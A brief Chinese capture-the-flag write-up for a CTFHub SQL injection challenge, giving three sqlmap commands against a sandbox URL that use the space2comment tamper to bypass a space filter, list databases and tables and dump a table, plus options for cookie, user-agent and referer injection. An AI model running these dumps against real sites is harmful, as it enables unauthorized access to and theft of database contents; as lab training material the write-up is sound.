题目:
图1. 题目截图
解题思路:
遇到sql注入问题统一用sqlmap去解决,基础的(字符型,整型,时间,布尔等)均可参考我上篇文章去解决:https://www.jianshu.com/p/05b33402afe9
本题难点:
但是如果按照普通的命令去解答此题,就会发现找不到表。
因此我们要加上绕过命令 --tamper=space2comment
- Step1
python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --dbs --tamper=space2comment
Step2
python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli --tamper=space2commentStep3
python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T gdjytroshe -D sqli --tamper=space2comment
注意:
如果出现感觉值不对,或者是<blank>的情况,可以把对应处理的日志给删除了,在跑一遍。
这是出现了错误的图片
重新再跑了一遍正确的图片
其他类型情况:
1. cookie型:
补充在命令里面补充语句:
--cookie "id=1;" --level 3
2. user-agent(ua)型:
--user-agent "id=1"
3. reffer型
--refer "id=1"
